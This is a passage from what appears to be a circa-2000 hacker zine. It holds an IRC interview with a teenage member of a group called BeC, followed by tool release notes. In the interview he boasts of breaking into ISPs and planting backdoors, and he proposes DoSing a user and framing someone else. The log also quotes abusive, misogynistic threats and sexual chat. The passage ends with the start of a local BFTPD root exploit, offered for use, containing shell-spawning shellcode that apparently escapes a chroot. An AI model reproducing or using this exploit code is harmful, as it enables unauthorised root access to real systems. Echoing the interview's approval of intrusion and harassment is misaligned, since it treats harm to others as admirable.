      [17:39] <[HWA]> some never grow out of it
      [17:40] <[HWA]> so you're 17 now you were how old when you started?
      [17:40] <[HWA]> 12
      [17:40] <Kr_D> 12
      [17:40] <Kr_D> when i was young and naive
      [17:40] <Kr_D> and evil
      [17:40] <Kr_D> i was after power, not knowledge
      [17:40] <[HWA]> what was your first home computer? or did you use school/elsewhere's equipment first?
      [17:40] <Kr_D> TSR 180
      [17:40] <[HWA]> like what got you into computers to begin with?
      [17:40] <Kr_D> my brothers box
      [17:40] <[HWA]> Wargames?
      [17:41] <[HWA]> :)
      [17:41] <Kr_D> i think it was 85
      [17:41] <Kr_D> 87 we got a c64
      [17:41] <[HWA]> did you play games or code straight away?
      [17:41] <Kr_D> and 89 an amiga 5000
      [17:41] <Kr_D> 500
      [17:41] <Kr_D> eveb
      [17:41] <Kr_D> i played alot
      [17:41] <[HWA]> pirated?
      [17:41] <Kr_D> yes
      [17:41] <Kr_D> i cracked codes
      [17:41] <Kr_D> for levels
      [17:42] <Kr_D> so i could finnish the game faster
      [17:42] <Kr_D> and stuff
      [17:42] <[HWA]> what about the games themselves, crack any copy protection?
      [17:42] <Kr_D> nope
      [17:42] <Kr_D> i support the amiga scene
      [17:42] <Kr_D> supported even
      [17:42] <[HWA]> did you ever get into the pirate scene at all, courier etc or anything ?
      [17:42] <Kr_D> no cracking of codes
      [17:42] <Kr_D> nope
      [17:42] <[HWA]> ok
      [17:42] <[HWA]> many do/did
      [17:43] <Kr_D> i was only interested in playing
      [17:43] <[HWA]> so you first got onto the internet in 1996?
      [17:43] <Kr_D> and controling the box
      [17:43] <[HWA]> what OS were you running then?
      [17:43] <Kr_D> no, that was in 95
      [17:43] <Kr_D> Windows 3.11
      [17:43] <Kr_D> from my school
      [17:43] <[HWA]> ok 1995. did you run ibm clone and windows?
      [17:43] <[HWA]> what OS do you run now?
      [17:43] <[HWA]> Linux?
      [17:43] <Kr_D> i owned an amiga1200 then
      [17:44] <Kr_D> running Amiga OS 3.1
      [17:44] <Kr_D> i think
      [17:44] <[HWA]> Minix was available for the Amiga or Qnix
      [17:44] <Kr_D> and sucked
      [17:44] <[HWA]> I think there is even a linux for Amiga, not sure
      [17:44] <[HWA]> possibly coherent also
      [17:44] <Kr_D> tehre are many
      [17:44] <[HWA]> nod
      [17:44] <Kr_D> Turbo/falcon/redhat
      [17:44] <[HWA]> do you use a unix variety now though?
      [17:44] <[HWA]> or still use windows mainly?
      [17:44] <Kr_D> i only use unix
      [17:45] <[HWA]> which flavour?
      [17:45] <Kr_D> i HATE windows
      [17:45] <Kr_D> and will never use it
      [17:45] <[HWA]> what about X Windowss
      [17:45] <Kr_D> solaris/FreeBSD
      [17:45] <[HWA]> -s
      [17:45] <Kr_D> CDE
      [17:45] <[HWA]> whats CDE? i should probably know but i'm blank on it 
      [17:45] <Kr_D> Cumm0nd3zk70p env4yr0m3n7
      [17:45] <[HWA]> ah yea
      [17:45] <[HWA]> ok
      [17:45] <Kr_D> it's HP's/SGI's/Sun's own version of MWM
      [17:46] <Kr_D> looks and feels like mwm
      [17:46] <[HWA]> what do you want BeC to do, what is BeC planning to do in the future?
      [17:46] <Kr_D> i want to "be nauhty at tsutomus sight"
      [17:46] <Kr_D> by owning ariel.sdsc.edu
      [17:46] <Kr_D> and not letting him access it
      [17:46] <[HWA]> are you interested in computer security as a possible area of work or do you work in compsec at any level now? 
      [17:47] <Kr_D> heh
      [17:47] <[HWA]> why target shimomura, because he owned mitnick?
      [17:47] <Kr_D> i think i'll prolly end up working as a unix admin somewhere
      [17:47] <Kr_D> he did it for the money
      [17:47] <[HWA]> is mitnick an idol of yours?
      [17:47] <Kr_D> i like his style
      [17:47] <[HWA]> yes and the fame
      [17:47] <Kr_D> he didnt do anything special 
      [17:47] <Kr_D> but he did alot
      [17:47] <[HWA]> mitnick is a net/phreak addict
      [17:47] <Kr_D> like, back in teh 80;s
      [17:51] *** Disconnected
      [18:00] *** Rejoined channel #INTERVIEW_BeC
      [] Channel [ #INTERVIEW_BeC ] Modes [ +k ]
      [18:00] <[HWA]> [17:48] <[HWA]> do you have any experience with radios like mitnick (and myself) do? ie:ham gear?
      [18:00] <[HWA]> [17:48] <[HWA]> example: packet radio or 2m/440cm repeaters etc 
      [18:00] <[HWA]> [17:48] <[HWA]> licensed or not.
      [18:00] <[HWA]> [17:48] <[HWA]> never get into that?
      [18:00] <[HWA]> [17:49] <[HWA]> you can phreak and access the net using ham equipment, i've irc'd on packet radio with a hand held radio and tnc 
      [18:00] <[HWA]> [17:49] <[HWA]> hooked to a freebsd box
      [18:00] <Kr_D> hmmss
      [18:00] <[HWA]> ./.
      [18:01] <[HWA]> mitnick is a ham radio op thats why i ask
      [18:01] <[HWA]> he was hoping to get his license back after his release from jail i dont know if he was allowed it or not
      [18:01] <Kr_D> ok
      [18:01] <[HWA]> i wrote an article on it.
      [18:02] <[HWA]> we're pretty much nearly ready to wrap up here i think anyway
      [18:02] <[HWA]> unless you have much more to say
      [18:02] <Kr_D> nope
      [18:03] <[HWA]> I don't have much in the way of questions since BeC is relatively new
      [18:03] <Kr_D> no radio
      [18:03] <Kr_D> i would like to know thou
      [18:03] <Kr_D> how to play w/ radios
      [18:03] <Kr_D> hmmss
      [18:03] <Kr_D> is he allowed to use hamradios ?
      [18:03] <Kr_D> ok
      [18:03] <Kr_D> i hope he will come online soon
      [18:03] <Kr_D> and join #hwa-security
      [18:03] <Kr_D> os i can ask him stuff
      [18:03] <Kr_D> about tsutomu
      [18:03] <Kr_D> so that i can defeat him
      [18:03] <Kr_D> 'MWAHAHAHAHAHHAHA
      [18:03] <[HWA]> not sure
      [18:03] <Kr_D> i dono
      [18:03] <Kr_D> ask me stuff and i'll answer
      [18:03] <Kr_D> heh
      [18:03] <Kr_D> june 2000
      [18:03] <Kr_D> not sure?
      [18:03] <[HWA]> dunno what to ask, i'm questionless :(
      [18:04] <Kr_D> ask me if i have a glass of water
      [18:04] <[HWA]> what about June 2000
      [18:04] <Kr_D> bec was created then
      [18:04] <[HWA]> ah
      [18:04] <[HWA]> so backtracking , what has BeC done since its inception?
      [18:05] <[HWA]> and how many members? or is it a front group for one man?
      [18:05] <Kr_D> ok, so where done then
      [18:05] <Kr_D> let's talk about mafiaboy
      [18:05] <[HWA]> pretty much
      [18:05] <Kr_D> we are 3
      [18:05] <Kr_D> i "think"
      [18:05] <[HWA]> why 'think'?
      [18:05] <Kr_D> and we have done notjing
      [18:05] <[HWA]> an undecided member?
      [18:05] <Kr_D> i havent heard or seen one of them for two months
      [18:05] <Kr_D> i think he is either dead or busted
      [18:05] <[HWA]> but you are serious on targetting Tsutomu's computers or is that just a pipe dream?
      [18:05] <Kr_D> "the CC# guy"
      [18:06] <[HWA]> busted
      [18:06] <Kr_D> it's a pipe dream
      [18:06] <[HWA]> hrm
      [18:06] <[HWA]> he from same area or another country?
      [18:06] <Kr_D> he's from the us
      [18:06] <[HWA]> what about the other member?
      [18:06] <[HWA]> can you say nicks?
      [18:06] <Kr_D> i don't want to talk about other ppl
      [18:06] <Kr_D> heh
      [18:06] <[HWA]> ok
      [18:06] <Kr_D> for understandable reasons
      [18:07] <Kr_D> ok, now
      [18:07] <Kr_D> Mafiaboy
      [18:07] <[HWA]> we're done then thanks for talking with us about BeC.
      [18:07] <[HWA]> mafiaboy, what about him
      [18:07] <Kr_D> yeah
      [18:07] <Kr_D> that is what i am asking
      [18:07] *** [HWA] is now known as nobracket
      [18:07] <Kr_D> what about him
      [18:08] <Kr_D> what has he done that is so cool
      [18:08] <nobracket> he was busted for distributed denial of service attacks on major commercial sites
      [18:08] <nobracket> the names of which escape me at the moment
      [18:08] <Kr_D> yuck
      [18:08] <nobracket> he had hacked root in order to run mstream on them
      [18:08] <Kr_D> he probably thinks that is cool
      [18:09] <nobracket> i believe 100 or so roots
      [18:09] <Kr_D> that is nothing
      [18:09] <nobracket> wasted (imho) on a ddos net
      [18:09] <Kr_D> he was probably just a script kiddie
      [18:09] <nobracket> he held down these sites for 15 hrs or so and bragged about it openly on irc
      [18:09] <Kr_D> i mean, finding 100
      [18:09] <Kr_D> boxes isnt that hard
      [18:09] <nobracket> this was logged and sent to vetesgirl and i also got a copy and published the logs
      [18:09] <Kr_D> i hold on to my sites for life
      [18:10] <Kr_D> girl?
      [18:10] <Kr_D> GIRL?
      [18:10] <nobracket> ever come across a honeypot?
      [18:10] <Kr_D> is she goodlooking?`
      [18:10] <nobracket> yes vetesgirl she wrote 'vetescan' among other things
      [18:10] <Kr_D> i want her
      [18:10] <Kr_D> heh
      [18:10] <nobracket> I don't know she could look like dianora for all I know
      [18:11] <nobracket> (ROFL)
      [18:11] <Kr_D> or she could look like,.. nice
      [18:11] <Kr_D> so, what did mafiaboy say to her,
      [18:11] <nobracket> > >[Dianora   ) I want it back
      [18:11] <nobracket> > >[VetesGirl ) ur a fucking liar
      [18:11] <nobracket> > >[VetesGirl ) don't accuss me of shit until u have the facts dear
      [18:11] <nobracket> > >[VetesGirl ) I don't take channels
      [18:11] <nobracket> > >[VetesGirl ) and had no fucking part in html
      [18:11] <nobracket> > >[Dianora   ) you are on #html which was taken
      [18:11] <nobracket> > >[VetesGirl ) I am there legit
      [18:11] <nobracket> > >[VetesGirl ) i was invited and op'd
      [18:11] <nobracket> > >[VetesGirl ) I had no part in a take
      [18:11] <Kr_D> and what channel
      [18:12] <Kr_D> heh
      [18:12] <Kr_D> dionara = mafiaboy i reckon
      [18:12] <nobracket> dianora is an irc oper she codes ircd
      [18:12] <Kr_D> ok
      [18:12] <nobracket> vetesgirl's site is http://www.self-evident.com/
      [18:13] <Kr_D> so, what did mafiaboy say then
      [18:13] <Kr_D> briefly
      [18:13] <nobracket> you never heard of dianora or vetesgirl?
      [18:13] <Kr_D> i'v heard about vetesgirl
      [18:13] <nobracket> http://www.self-evident.com/refnet_old_news.html
      [18:13] <Kr_D> but not dionara
      [18:14] <Kr_D> so
      [18:14] <Kr_D> did mafiaboy get jail
      [18:14] <Kr_D> or did he get the chair?
      [18:14] <Kr_D> as in "theee chair"
      [18:14] <nobracket> jail
      [18:14] <Kr_D> bha
      [18:15] <Kr_D> for how lonmg?
      [18:15] <nobracket> +---------------------------------------
      [18:15] <nobracket>     | mafiaboy <~guest@www.oaklandathletics.com> (Internic Commercial)
      [18:15] <nobracket>      ircname  / ./slice 0 cnn.com 22 80
      [18:15] <nobracket>      server   / irc.mcs.net ([192.160.127.97] MCSNet Services -
      [18:15] <nobracket>     (312)803-MCS1)
      [18:15] <nobracket>     +--------------------------------------------------
      [18:15] <Kr_D> and how did they bust him
      [18:15] <Kr_D> many questions
      [18:15] <nobracket> http://www.self-evident.com/exploits/vetes
      [18:15] <nobracket> http://www.self-evident.com/exploits/vetes
      [18:15] <nobracket> check it 
      [18:15] <Kr_D> ok
      [18:15] <nobracket> those are the logs
      [18:16] <Kr_D> she busted him?
      [18:16] <Kr_D> evil girl
      [18:16] <Kr_D> i don't like whiteruss
      [18:16] <nobracket> http://users3.cgiforme.com/vadia/cfmboard.html
      [18:16] <Kr_D> or cyphex
      [18:16] <Kr_D> heh
      [18:16] <Kr_D> how could they trace him
      [18:16] <nobracket> i dont like a lot of people but play the devils advocate and mr noncomittal
      [18:17] <Kr_D> heh didn't clean up after dinner?
      [18:17] <Kr_D> you see
      [18:17] <nobracket> that and also it was rumoured someone narqed him out
      [18:17] <Kr_D> now he's "tounting" enslaved
      [18:17] <Kr_D> please kick him
      [18:17] <Kr_D> witch reason KrD
      [18:17] <Kr_D> it would make me really happy
      [18:17] <Kr_D> :)
      [18:18] <Kr_D> or D0S him
      [18:18] <Kr_D> and blaim mafiaboy
      [18:18] <nobracket> his message was posted by mafiaboy, posted on April 13, 2000 at 18:56:17 coming from No domain available
      [18:18] <nobracket> YOU LITTLE FUCKING SLUT, YOU ACTUALLY THOUGHT THEY CAUGHT ME? YOUR A FUCKING RETARDED NARC YOU SHOULD KNOW THAT ALL YOUR FUCKING INFORMATION IS WRONG YOU DUMB ASS WHORE AND WHEN IM BACK THIS PAGE ISNT
      [18:18] <nobracket> GONNA EXSIST ANYMORE YOU DUMB BITCH!! WERD OSB WERD ADPRO WERD SKIZER! 
      [18:18] <nobracket> he did packet her site and kept it down for some time
      [18:18] <Kr_D> heh
      [18:19] <Kr_D> i would never doo that
      [18:19] <nobracket> This message was posted by VetesGirl, posted on April 15, 2000 at 07:05:18 coming from gm.is
      [18:19] <nobracket> This message is a reply to BITCH IM BACK!! posted from mafiaboy posted at April 13, 2000 at 18:56:17 
      [18:19] <nobracket> > YOU LITTLE FUCKING SLUT, YOU ACTUALLY THOUGHT THEY CAUGHT ME? YOUR A FUCKING RETARDED NARC YOU SHOULD KNOW THAT ALL YOUR FUCKING INFORMATION IS WRONG YOU DUMB ASS WHORE AND WHEN IM BACK THIS PAGE
      [18:19] <nobracket> ISNT GONNA EXSIST ANYMORE YOU DUMB BITCH!! WERD OSB WERD ADPRO WERD SKIZER!
      [18:19] <nobracket> #1 if it is you, you are proably pr
      [18:19] <nobracket> shit
      [18:19] <nobracket> 1 if it is you, you are proably pretending that u didn't get caught so you can get your ass out of trouble and you are proably now a ci (confidential informant)
      [18:19] <nobracket> #2 Nark?? After the fact maybe You were on efnet msging everyone you could about the attacks and even msg'd your enemies (not a real bright move) and were putting on DoS shows in #!TNT (takes brains), lets see FBI heard about you on the 9th and the news was
      [18:19] <nobracket> posted on my page on the 13th I didn't come in first DAMN!
      [18:19] <nobracket> #3 Facts are correct you were o
      [18:19] <nobracket> on dsuper i remember you back in those days and the logs are true.
      [18:19] <nobracket> #4 Threaten all you like hun i know how it is and can say been there done that. Why do you packet? does it make you feel like a man, you gain respect from other lil boys who are just like you? You get to be SOMEBODY on efnet for a day wooohoo how leet
      [18:19] <nobracket> I honestly feel sorry for you. 
      [18:19] <nobracket> -=-
      [18:20] <nobracket> http://abcnews.go.com/sections/tech/DailyNews/webattacks000418.html
      [18:20] <nobracket> no
      [18:21] <Kr_D> you might aswell invite #linux.se
      [18:21] <nobracket> I let almost ANYONE in on PROBATION
      [18:21] <nobracket> if they suck they get the boot
      [18:21] <Kr_D> he p33rs me
      [18:21] <nobracket> so far i see nothing from him
      [18:21] <nobracket> but thats my problem'
      [18:21] <Kr_D> heh
      [18:21] <Kr_D> well, he kicked himself
      [18:21] <Kr_D> so, i'm satisfied
      [18:21] <Kr_D> i doin't understand that someone
      [18:21] <Kr_D> can be so famous for dosing sites
      [18:22] <Kr_D> that is so lame
      [18:22] <nobracket> Mafiaboy and the 15-year-old claimed credit for attacking
      [18:22] <nobracket>                  not only CNN.com but also E*TRADE and several
      [18:22] <nobracket>                  smaller sites. Mafiaboy also shared technical information
      [18:22] <nobracket>                  that only someone involved in the attacks would know,
      [18:22] <nobracket>                  Lyle said. 
      [18:22] <Kr_D> i mean, if i would (and i can) relay ALL calls
      [18:22] <Kr_D> from sweded to you
      [18:22] <nobracket>    Mafiaboy was saying What should I hit next? What
      [18:22] <nobracket>                  should I hit next? and people on the channel were
      [18:22] <nobracket>                  suggesting sites, and Mafiaboy was saying, OK, CNN,
      [18:22] <Kr_D> would i get famous
      [18:22] <Kr_D> NO
      [18:22] <nobracket>     A subscriber called Mafiaboy previously held two
      [18:22] <nobracket>                  accounts with Delphi Supernet, a Montreal Internet
      [18:22] <nobracket>                  service provider that Toronto-based ISP Internet Direct
      [18:22] <nobracket>                  bought last year. 
      [18:22] <nobracket>                       The accounts were closed in March 1998 because
      [18:22] <nobracket>                  Mafiaboy violated subscriber policies, but Internet Direct
      [18:22] <nobracket>                  would not say what the violations entailed.
      [18:22] <nobracket> hahaha
      [18:22] <nobracket> i thought he was from Montreal
      [18:22] <nobracket> hrm
      [18:22] <Kr_D> heh
      [18:23] <nobracket> Investigators were able to trace the attacks to Mafiaboy
      [18:23] <nobracket>                  by examining the log files of a computer at a University of
      [18:23] <nobracket>                  California at Santa Barbara research lab, which was
      [18:23] <nobracket>                  among those used to attack the CNN.com site. 
      [18:23] <nobracket>      The Royal Canadian Mounted Police is expected to
      [18:23] <nobracket>                  announce the arrest in a press conference Wednesday at
      [18:23] <nobracket>                  10:30 a.m. ET. The Justice Department and the FBI,
      [18:23] <nobracket>                  which assisted in the investigation, also are expected to
      [18:23] <nobracket>                  make a statement afterward. 
      [18:23] <Kr_D> heh
      [18:23] <nobracket> i remeber that was watching the conference on CNN
      [18:23] <nobracket> it was boring
      [18:24] <Kr_D> if i would get busted for everthing i'v done
      [18:24] <Kr_D> i would be hunted like mitnick
      [18:24] <Kr_D> and more famous
      [18:24] <nobracket> we (hwa) also staged a massive phake media conference and opened up a chat channel called #mediaevent did you read about that?
      [18:24] <nobracket> mafiaboy or his "friend" showed up.
      [18:24] <Kr_D> nope
      [18:24] <Kr_D> heh
      [18:24] <nobracket> its in one of the zine issues
      [18:24] <nobracket> the logs
      [18:25] <nobracket> quite funny, wired was going to do a story on it but later declined
      [18:25] <Kr_D> can you dcc a .gz with the lates issue?
      [18:25] <nobracket> since it was of course a hoax
      [18:25] <Kr_D> i'm lacy
      [18:25] <Kr_D> hmms
      [18:25] <nobracket> i can dcc a zip
      [18:25] <Kr_D> i'v been thinking about this for 4 minutes
      [18:25] <Kr_D> and
      [18:25] <Kr_D> no, gz
      [18:25] <nobracket> but if u want gz no prob
      [18:25] <nobracket> sec
      [18:25] <Kr_D> chill even
      [18:25] <Kr_D> just "be there"
      [18:26] <Kr_D> and do absolutley nothing
      [18:26] <nobracket> you can be a underground rumour mill informer
      [18:26] <nobracket> :-)
      [18:26] <Kr_D> heh
      [18:26] <nobracket> sure
      [18:26] <Kr_D> i can start rumors ;)
      [18:26] <Kr_D> ok, well
      [18:26] <Kr_D> sure
      [18:26] <Kr_D> :)
      [18:26] <nobracket> where to direct to? pop is broken right now 
      [18:26] <nobracket> :(
      [18:26] <Kr_D> do i get op on #hwa-security?      
      [18:27] <Kr_D> those webbmails are quite good acctually
      [18:27] <nobracket> done
      [18:27] <Kr_D> ok
      [18:28] <Kr_D> i'm planning to setup a cpt account @sun.com
      [18:28] <Kr_D> krd@sun.com ,.. yumme
      [18:28] <nobracket> lol
      [18:28] <Kr_D> heh
      [18:28] <nobracket> set one up for me too
      [18:28] <nobracket> nophear@sun.com
      [18:28] <nobracket> ;)
      [18:28] <Kr_D> ^[@sun.com :)=
      [18:28] <nobracket> fwd to nophear@hwa-security.net
      [18:28] <Kr_D> (not bracket)
      [18:28] <nobracket> are you on there?
      [18:28] <Kr_D> and they wil trace you in five seconds
      [18:28] <nobracket> you owned sun?
      [18:29] <Kr_D> i was
      [18:29] <nobracket> haha
      [18:29] <Kr_D> www.sun.se
      [18:29] <nobracket> cool
      [18:29] <Kr_D> they sent me a copy of solaris
      [18:29] <Kr_D> for "my trouble"
      [18:29] <Kr_D> i liked it
      [18:29] <nobracket> i owned some NS and lost em, pissed me off the didnt remove the backdoors they shutdown the servers completely
      [18:29] <nobracket4> never came back up so must have changed ips
      [18:29] <nobracket> weird
      [18:29] <Kr_D> i used to own three ISP;s in sweden
      [18:29] <nobracket> .jp boxen
      [18:29] <Kr_D> *.?? telia.com and 
      [18:29] <nobracket> ever do any carding?
      [18:30] <Kr_D> swipnet.se
      [18:30] <Kr_D> no carding
      [18:30] <Kr_D> until algonet busted me 
      [18:30] <Kr_D> that was april 97
      [18:30] <Kr_D> :)
      [18:30] <Kr_D> i dialed into them
      [18:30] <Kr_D> ok
      [18:30] <nobracket> what happened in the bust?
      [18:30] <nobracket> how did they catch ya?
      [18:30] <Kr_D> they called me up
      [18:30] <Kr_D> i used my first account
      [18:30] <Kr_D> guest23
      [18:30] <Kr_D> thats how i got in
      [18:30] <nobracket> haha
      [18:31] <Kr_D> guest??/@???net
      [18:31] <nobracket> then rooted them?
      [18:31] <Kr_D> and i wanted to try my new backdoor
      [18:31] <Kr_D> so i called them up
      [18:31] <Kr_D> saw lpc: down
      [18:31] <Kr_D> and the minute later the phone rang
      [18:31] <nobracket> what scanner if any do you use? any other tools you use or recommend to wannabe hax0rs?
      [18:31] <Kr_D> and asked me "do you own a computer with a modem"
      [18:31] <nobracket> lol
      [18:31] <Kr_D> i like, died
      [18:31] <Kr_D> there are no wannabee hax0rs anymore
      [18:31] <nobracket> "my dad does"
      [18:31] <Kr_D> they are all windows users
      [18:31] <nobracket> think not?
      [18:32] <nobracket> i think there are some
      [18:32] <Kr_D> i started as a amiga user
      [18:32] <Kr_D> everybody novadays will grow up with GUI only
      [18:32] <Kr_D> and no eleet stuff
      [18:32] <Kr_D> i met this kidd thou on a system
      [18:32] <nobracket> i started on a trs80 but first own computer was a vic20 with 5k memory
      [18:32] <Kr_D> i saw he was a hacker right at once
      [18:32] <Kr_D> so i staled him
      [18:32] <Kr_D> stalked even
      [18:32] <nobracket> staled? stalked
      [18:32] <nobracket> ok
      [18:32] <nobracket> why
      [18:32] <Kr_D> and talked him and said i was the sysadmin
      [18:32] <Kr_D> heh
      [18:33] <Kr_D> later i told the triouth
      [18:33] <nobracket> haha
      [18:33] <Kr_D> he was only 14
      [18:33] <Kr_D> abd still owned the net
      [18:33] <Kr_D> their
      [18:33] <Kr_D> he will become something for sure
      [18:33] <Kr_D> he wrote all his shit by hand
      [18:33] <Kr_D> with C
      [18:33] <nobracket> what do you mean, "he will become something for sure"
      [18:33] <Kr_D> a hacker
      [18:33] <Kr_D> a REAL hacker
      [18:34] <nobracket> ah so he was skilled and you respect him ok
      [18:34] <Kr_D> no
      [18:34] <nobracket> did he teach you anything?
      [18:34] <nobracket> not sure what you're meaning then
      [18:34] <Kr_D> but he was about as good as i was when i was 13
      [18:34] <Kr_D> still, he knew what he was doing
      [18:34] <nobracket> what about the scanners/tools?
      [18:35] <Kr_D> nmap
      [18:35] <Kr_D> and /usr/bin/rpcinfo
      [18:35] <Kr_D> /usr/sbin/rcpinfo even
      [18:35] <Kr_D> that is what i use
      [18:35] <nobracket> have you exploited dns cache poisoning?
      [18:35] <nobracket> jizz.c
      [18:35] <Kr_D> no
      [18:35] <nobracket> erect.c
      [18:35] <nobracket> etc
      [18:36] <nobracket> friend came up with  the concept he was first to do it
      [18:36] <Kr_D> i try not to use exploits
      [18:36] <Kr_D> i want to root the box by hand
      [18:36] <Kr_D> i have me evil trix to get root
      [18:36] <Kr_D> erm
      [18:36] <Kr_D> not here
      [18:36] <Cruciphux> brb
      [18:36] <nobracket> heh
      [18:36] <nobracket> sorry
      [18:39] <nobracket> who is zoa?
      [18:40] <nobracket> [18:38] *** Zoa_Chien (~Michelle@dial-15.kulak.ac.be) has joined #hwa-security
      [18:40] <nobracket> [18:39] <Kr_D> are they STALKING ME
      [18:40] <nobracket> [18:39] <Kr_D> Zoa_Chien, you will NEVER get me
      [18:40] <nobracket> [18:39] <Zoa_Chien> euhm.. Kr_D stoned again ?
      [18:41] <nobracket> [18:40] <Kr_D> but i was evil to kulac.ac.be
      [18:41] <nobracket> [18:40] <Kr_D> hmmss
      [18:41] <nobracket> [18:40] <Zoa_Chien> enjoy ku*.??.be
      [18:41] <nobracket> [18:40] <Zoa_Chien> and enjoy k*.??.be too
      [18:41] <nobracket> [18:40] <Kr_D> ok
      [18:41] <nobracket> Zoa_Chien is ~Michelle@dial-15.kulak.ac.be * sempronia
      [18:41] <nobracket> Zoa_Chien on #hwa-security 
      [18:41] <nobracket> Zoa_Chien using irc.light.se [195.67.208.172] It's alive, it's AAALIIIIVEEE
      [18:41] <nobracket> [18:40] <Kr_D> are you after me?
      [18:42] <nobracket> [18:40] <Kr_D> you know you can never capture me
      [18:42] <nobracket> [18:41] <Zoa_Chien> Krd.. i don't even want to look after you :-)
      [18:42] <nobracket> i'll include this too
      [18:42] <Kr_D> heh
      [18:42] <Kr_D> yeah
      [18:42] <Kr_D> heh
      [18:43] <Kr_D> shit
      [18:43] <Kr_D> everytime
      [18:43] <Kr_D> i use rixtele.com as ISP
      [18:43] <Kr_D> i feeel, like someone is watching me
      [18:43] <Kr_D> cause sometime
      [18:43] <Kr_D> the modem disconnects when i trie to haxor
      [18:43] <Kr_D> and i have allready got busted once for owning kevin.rixtele.com
      [18:43] <Kr_D> by rixtele.com
      [18:43] <nobracket> Kr_D is ~k0rrupt@213.x.x.x * Korrupt@sweden
      [18:43] <nobracket> Kr_D on @#chat-along.with-setvie #hwa-security @#INTERVIEW_BeC #hwa.hax0r.news #it99 
      [18:43] <nobracket> Kr_D using irc.light.se [195.67.208.172] It's alive, it's AAALIIIIVEEE
      [18:43] <Kr_D> it feels like some site has contacted rixtele.com
      [18:43] <nobracket> setvie
      [18:43] <nobracket> ;)
      [18:43] <Kr_D> and now they are sniffing my ass
      [18:44] <nobracket> lol
      [18:44] <Kr_D> no, i'm serious
      [18:44] <nobracket> sniffing your ass like the DOGS they are!
      [18:44] <Kr_D> i got a REALLY bad feeling
      [18:44] <Kr_D> about them
      [18:44] <nobracket> hrm
      [18:44] <nobracket> ditch em
      [18:44] <Kr_D> yeah
      [18:44] <Kr_D> i only use them sometime
      [18:44] <Kr_D> like _now_
      [18:44] <nobracket> hey you think a dvd player lef on pause overnight will burn the cd?
      [18:44] <Kr_D> heh
      [18:45] <Kr_D>  dono
      [18:46] <Kr_D> ?
      [18:46] * Cruciphux is back. hi. ..(2h19m50s)
      [18:47] <nobracket> [18:46] <Kr_D> Zoa_Chien 
      [18:47] <nobracket> 18:46] <Kr_D> Zoa_Chien 
      [18:47] <nobracket> [18:46] <Kr_D> whoohooo
      [18:47] <nobracket> [18:46] <Zoa_Chien> yes ?
      [18:47] <nobracket> [18:46] <Kr_D> are you stalking me
      [18:47] <nobracket> [18:47] <Zoa_Chien> yes :-)
      [18:47] <nobracket> brb
      [18:50] <nobracket> http://www.ntsource.com/~xxxxxx/efnet/
      [18:56] <nobracket> [18:54] <Kr_D> ok
      [18:56] <nobracket> [18:54] <Kr_D> so what are you wearing?
      [18:56] <nobracket> [18:54] <Zoa_Chien> nothin' much
      [18:56] <nobracket> [18:54] <Kr_D> mmmm
      [18:56] <nobracket> [18:55] <Zoa_Chien> want to see mi pic ?
      [18:56] <nobracket> [18:55] <Kr_D> i want to
      [18:56] <nobracket> [18:55] <Enslaved> i run windows on a sparc ultra10
      [18:56] <nobracket> [18:55] <Cruciphux> yeah me too
      [18:56] <nobracket> [18:55] <Kr_D> if you promise yyou are a redhet with firm tits
      [18:56] <nobracket> [18:55] <Zoa_Chien> its me and my sister
      [18:56] <nobracket> [18:55] <Kr_D> readhead even
      [18:56] <nobracket> [18:55] <Cruciphux> lol
      [18:56] <nobracket> [18:55] <Zoa_Chien> http://www.securax.org/xx/xxxo/
      [18:58] <nobracket> [18:56] <Kr_D> you look injured
      [18:58] <nobracket> [18:57] <Cruciphux> yeah we dont need that shit
      [18:58] <nobracket> [18:57] <Cruciphux> the door is over there ->
      [18:58] <nobracket> [18:57] <pip> dmamit
      [18:58] <nobracket> [18:57] <pip> hold up
      [18:58] <nobracket> [18:57] *** Cruciphux sets mode: -o+b Zoa_Chien *!*Michelle@*.ac.be
      [18:58] <nobracket> [18:57] *** Zoa_Chien was kicked by Cruciphux ((ar) sick puppy)
      [19:04] *** Cruciphux has quit IRC (Ping timeout: 360 seconds)
      [19:04] *** Disconnected
      
      See more from the BeC interviews and history in future issues.
      
      Session Time: Sun Oct 29 00:00:00 2000
      
      Cruci
      
      @HWA
      
       
328.0 [HWA] Releases: eth0 releases sscan2k-pre6 scanner
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          
      http://hwa-security.net
      http://hwa-security.net/hot.html
      
      Check http://hwa-security.net for more; also check
      http://hwa-security.net/hot.html for new releases.
      
      http://hwa-security.net/hot-new/sscan2k-pre6.HWA.tar.gz
      
      @HWA
      
329.0 [HWA] Release: WhiteRuss w00p local BFTPD exploit PoC
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://hwa-security.net
      http://hwa-security.net/hot.html

      http://hwa-security.net/hot-new/HWA-w00p-local.c
      
      /* RELEASED BY Cruciphux HWA-SECURITY.NET     */
      /* w00p.c (HWA-w00p-local.c)                  */
      /* coded: Oct 25th                            */
      /* released Oct 29th                          */
      /* REMOTE exploit based on w00p.c forthcoming */
      
      #include <stdio.h>
      #include <string.h>
      #include <stdlib.h>
      
      #define ADDRS   54
      
              
              /* GREETZ TO JBUST, SKRIPT KIDDIES(I WUZ ONE), Enslaved, AND HWA-SECURITY*/
              /* VENGLIN, ETH0, CRUCIPHUX, ***non crippled version***. Have fun.
              /* Jbust is off of IRC h3h3 anyhow l4m3rz chroot() code */
      char linuxcode[]="\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
                       "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
                       "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27\xcd"
                       "\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
                       "\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e"
                       "\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09"
                       "\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88"
                       "\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
                       "\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31"
                       "\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30\x62\x69\x6e"
                       "\x30\x73\x68\x31\x2e\x2e\x31\x31";
